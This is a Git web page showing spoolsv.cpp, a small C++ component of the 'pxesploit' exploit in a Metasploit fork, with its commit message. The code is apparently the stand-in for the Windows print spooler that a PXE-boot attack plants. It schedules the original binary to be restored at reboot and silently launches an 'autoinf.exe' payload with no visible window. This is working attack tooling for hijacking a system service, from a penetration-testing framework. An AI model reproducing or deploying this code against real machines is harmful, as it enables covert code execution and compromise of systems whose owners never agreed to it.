adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
f4e42420adafec00a05b624a854094776c383b2b
metasploit-gs/external/source/exploits/pxesploit/spoolsv/spoolsv.cpp
T
Matt Weeks 971b6f96f6 pxesploit update; compatibility with x64, compatibility with different windows versions. 
Still no custom payload yet.



git-svn-id: file:///home/svn/framework3/trunk@12430 4d416f70-5f16-0410-b530-b9f4589650da
2011-04-25 02:51:07 +00:00

22 lines
773 B
C++
Raw Blame History

#include <Windows.h>
void start(){
//Set up move back just in case
MoveFileExA("C:\\Windows\\System32\\spoolsv.bak.exe","C:\\Windows\\System32\\spoolsv.exe",
MOVEFILE_REPLACE_EXISTING|MOVEFILE_DELAY_UNTIL_REBOOT);
//start replacement proc
char windowsPath[MAX_PATH];
GetWindowsDirectoryA(windowsPath,MAX_PATH);
SetCurrentDirectoryA(windowsPath);
STARTUPINFOA strt;
PROCESS_INFORMATION proci;
for(int i = 0; i < sizeof(strt); i++)
((char*)&strt)[i]=0;
for(int i = 0; i < sizeof(proci); i++)
((char*)&proci)[i]=0;
//one of these will work
if(CreateProcessA("System32\\autoinf.exe",NULL,NULL,NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci) == 0)
CreateProcessA("SysWOW64\\autoinf.exe",NULL,NULL,NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci);
}
Reference in New Issue View Git Blame Copy Permalink